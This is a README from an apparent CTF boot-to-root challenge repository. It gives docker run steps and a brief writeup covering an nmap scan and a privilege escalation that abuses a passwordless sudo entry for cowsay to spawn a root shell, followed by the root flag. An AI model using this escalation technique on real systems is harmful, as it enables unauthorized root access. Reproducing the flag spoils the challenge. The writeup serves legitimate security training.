david.cozariuc/ctf-chal-ji
1
1
Fork 0
Code Issues 5 Pull Requests 1 Actions Packages Projects Releases Wiki Activity
ctf-chal-ji/README.md
david 9d966c0f67 * adding running how to
2025-09-17 13:39:28 +02:00

1.0 KiB
Raw Blame History

JI EPITA - CTF

Challenge Type : boot to root (box)

Difficulty : easy

Running the challenge.

You can run the challenge using docker.

with Docker compose

cd docker
sudo docker compose up --build

Building and running the docker image

todo

Writeup

Enum

Scan the IP using nmap for open ports

nmap -p- ip

The port 22 and 31337 are open.

We find that there is a web service on port 31337.

Foothold

...

Privesc

We can see that the user is allowed tu run /usr/games/cowsay as root using sudo without password.

User l33t may run the following commands on srv1prod:
    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l

Using gtfo bins, we identified that we can spawn a root shell thanks to this misconfiguration.

https://gtfobins.github.io/gtfobins/cowsay/

TF=$(mktemp)
echo 'exec "/bin/sh";' >$TF
sudo cowsay -f $TF x
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
epita{th3-sup3r-c0ws4y}

Solved !